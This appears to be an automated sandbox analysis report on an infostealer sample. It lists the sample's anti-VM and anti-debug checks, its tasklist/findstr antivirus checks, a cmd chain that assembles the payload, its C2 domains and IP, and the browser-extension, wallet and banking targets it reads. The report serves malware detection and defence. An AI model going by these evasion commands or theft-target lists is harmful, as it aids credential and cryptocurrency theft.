                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Climb.com, 0000000E.00000002.3470289773.0000000001BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Set-up.exe, Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296354162.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DetectVirtualMachine
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                Source: Set-up.exe, 00000003.00000003.2264873236.0000000000AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: CLaYpUL3zw.exe, 00000000.00000002.2260643842.00000000016FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Climb.com, 0000000E.00000003.2536912337.00000000044CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: SICE
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056F4FF BlockInput,14_2_0056F4FF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_004F338B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00515058 mov eax, dword ptr fs:[00000030h]14_2_00515058
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005520AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,14_2_005520AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00522992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00522992
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00510BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00510BAF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00510D45 SetUnhandledExceptionFilter,14_2_00510D45
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00510F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00510F91
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Climb.com, 0000000E.00000003.2456084330.0000000004554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Climb.com, 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: spuriotis.click
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00551B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00551B4D
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_004F338B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055BBED SendInput,keybd_event,14_2_0055BBED
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055EC6C mouse_event,14_2_0055EC6C
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005514AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,14_2_005514AE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00551FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,14_2_00551FB0
                Source: Climb.com, 0000000E.00000000.2308179034.00000000005B3000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2460332709.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Alt.11.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Climb.comBinary or memory string: Shell_TrayWnd
                Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2258610210.0000000000EE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^(Program Manager
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00510A08 cpuid 14_2_00510A08
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0054E5F4 GetLocalTime,14_2_0054E5F4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0054E652 GetUserNameW,14_2_0054E652
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_0052BCD2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,2_2_00406831
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: procmon.exe
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: wireshark.exe
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: :"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Ve
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
                Source: Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152>u
                Source: global trafficTCP traffic: 192.168.2.5:49762 -> 194.87.58.92:80
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
